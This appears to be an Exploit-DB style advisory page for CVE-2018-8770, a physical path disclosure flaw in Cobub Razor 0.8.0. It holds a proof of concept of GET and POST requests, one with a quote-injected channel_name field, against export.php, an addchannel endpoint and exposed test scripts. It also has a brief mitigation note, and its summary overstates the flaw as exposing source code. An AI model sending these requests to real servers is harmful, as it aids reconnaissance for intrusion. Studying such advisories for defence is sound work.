Cobub Razor 0.8.0 Physical path Leakage Vulnerability

vendor:

Razor

by:

Kyhvedn

5.3

CVSS

MEDIUM

Physical path Leakage

CWE

Product Name: Razor

Affected Version From: 0.8.0

Affected Version To: 0.8.0

Patch Exists: NO

Related CWE: CVE-2018-8770

CPE: a:cobub:razor:0.8.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2018

Cobub Razor 0.8.0 Physical path Leakage Vulnerability

Cobub Razor 0.8.0 is vulnerable to physical path leakage. An attacker can send a GET request to the URL http://localhost/export.php and a POST request to the URL http://localhost/index.php?/manage/channel/addchannel with the data channel_name=test&platform=1. This will allow the attacker to access the physical path of the application and view the source code of the application.

Mitigation:

The application should be configured to prevent physical path leakage. The application should also be configured to prevent directory listing.

Source

Exploit-DB raw data:

# Exploit Title:  Cobub Razor 0.8.0 Physical path Leakage Vulnerability
# Date: 2018-04-19
# Exploit Author: Kyhvedn
# Vendor Homepage: http://www.cobub.com/
# Software Link: https://github.com/cobub/razor
# Version: 0.8.0
# CVE : CVE-2018-8770

#PoC:

URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test"&platform=1

HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localhost/tests/controllers/posttagTest.php
http://localhost/tests/controllers/postusinglogTest.php
http://localhost/tests/fixtures/Controller_fixt.php
http://localhost/tests/fixtures/Controller_fixt2.php
http://localhost/tests/fixtures/view_fixt2.php
http://localhost/tests/libs/ipTest.php
http://localhost/tests/models/commonDbfix.php